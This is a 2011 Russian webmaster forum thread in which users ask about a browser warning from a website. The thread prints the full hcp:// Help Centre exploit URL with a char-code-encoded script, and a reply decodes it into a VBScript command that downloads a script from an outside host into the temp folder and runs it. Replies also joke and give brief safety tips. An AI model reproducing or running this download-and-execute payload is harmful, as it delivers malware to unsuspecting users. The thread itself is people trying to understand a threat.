что за хуйня ? - Форум успешных вебмастеров

qazxcvbnm · 28.03.2011, 20:22

при заходе на страницу netlore.ru/feikovye_oblojki Браузер сообщил что страница пытается открыть какую-то программу

касперский молчал
dr web online Ничего не нашёл

техническая информация, которая была в сообщении браузера

PHP код:


			
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,122,97,113,49,56,46,99,122,46,99,99,47,103,97,109,101,115,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,50,52,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>

что цэ таке ?

Andy123 · 28.03.2011, 20:25

cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://zaq18.cz.cc/games/hcp_vbs.php?f=24",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B)

.WriteLine .responseText:End With

.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe

qazxcvbnm · 28.03.2011, 20:33

при попытке редактирования поста касперский ругается

RedHead · 28.03.2011, 20:38

НИКАЧАТИ ПОЦАНИ ТАМ БЛЯДЬ ВИРУС!!! Я СКОЧАЛ БРАТА ЗАКРУТИЛО И В ЧЁРНУЮ ДЫРУ ЗАСОСАЛО ! ЧТО Ж ТЫ ДЕЛАЕШЬ-ТО ИРОД! (с)

qazxcvbnm · 28.03.2011, 20:41

ну кстати да, по ссылке ходить не надо, хотя если даже ie8 заблокировал, то остальные браузеры тоже должны

ссылка zaq18.cz.cc/games/hcp_vbs.php?f=24 даёт это

что оно делает ?

izlade · 28.03.2011, 20:42

По ссылке не ходил. Брат выздоровел.

Andy123 · 28.03.2011, 20:47

оключаем плагины (ява,flash,pdf) яваскрипт и ходим где хотим

simba · 29.03.2011, 04:49

Цитата:

Сообщение от qazxcvbnm

что оно делает ?

основная задача - скачать и запустить. просто закодировали код)